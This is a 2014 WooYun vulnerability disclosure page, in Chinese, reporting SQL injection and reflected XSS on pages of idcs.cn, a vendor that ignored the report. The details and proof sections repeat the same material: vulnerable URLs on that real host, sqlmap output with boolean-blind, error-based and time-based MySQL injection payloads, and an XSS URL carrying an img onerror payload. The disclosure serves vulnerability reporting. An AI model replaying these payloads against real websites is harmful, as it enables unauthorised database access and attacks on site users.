当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076954

漏洞标题:天互数据sql注入(动态显错注入+伪静态盲注+xss)

相关厂商:idcs.cn

漏洞作者: 路人甲

提交时间:2014-09-22 19:14

修复时间:2014-09-27 19:16

公开时间:2014-09-27 19:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-22: 细节已通知厂商并且等待厂商处理中
2014-09-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

再来几个注入点

详细说明:

1.http://autosite.idcs.cn/webmall/query.php?catid=27 加'显错
http://autosite.idcs.cn/webmall/query.php?typeid=6 加'显错
http://autosite.idcs.cn/news/class/index.php?catid=1&myord=dtime&myshownums=20&key=企业&imageField.x=28&imageField.y=9 myshownums 加'显错
http://autosite.idcs.cn/news/class/?76*1.html http://autosite.idcs.cn/news/class/?76*2.html伪静态盲注
2.以http://autosite.idcs.cn/webmall/query.php?catid=27为例:
GET parameter 'catid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 43 HTTP(s) requ
ests:
---
Place: GET
Parameter: catid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=27' AND 6693=6693 AND 'Fdow'='Fdow
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: catid=27' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x71736e6771
,(SELECT (CASE WHEN (6131=6131) THEN 1 ELSE 0 END)),0x717a697971,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'jTxJ'='jTxJ
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: catid=27' AND SLEEP(5) AND 'bKcd'='bKcd
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
3.xss:
http://autosite.idcs.cn/news/class/index.php?catid=0&myord=dtime&myshownums=20&key=%27%22%3E%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&imageField.x=38&imageField.y=10

QQ截图20140922155513.jpg

漏洞证明:

1.http://autosite.idcs.cn/webmall/query.php?catid=27 显错
http://autosite.idcs.cn/webmall/query.php?typeid=6 显错
http://autosite.idcs.cn/news/class/index.php?catid=1&myord=dtime&myshownums=20&key=企业&imageField.x=28&imageField.y=9 myshownums 显错
http://autosite.idcs.cn/news/class/?76.html 伪静态盲注
2.以http://autosite.idcs.cn/webmall/query.php?catid=27为例:
GET parameter 'catid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 43 HTTP(s) requ
ests:
---
Place: GET
Parameter: catid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=27' AND 6693=6693 AND 'Fdow'='Fdow
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: catid=27' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x71736e6771
,(SELECT (CASE WHEN (6131=6131) THEN 1 ELSE 0 END)),0x717a697971,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'jTxJ'='jTxJ
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: catid=27' AND SLEEP(5) AND 'bKcd'='bKcd
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
3.xss:
http://autosite.idcs.cn/news/class/index.php?catid=0&myord=dtime&myshownums=20&key=%27%22%3E%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&imageField.x=38&imageField.y=10

QQ截图20140922155513.jpg

修复方案:

.

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-27 19:16

厂商回复:

最新状态:

暂无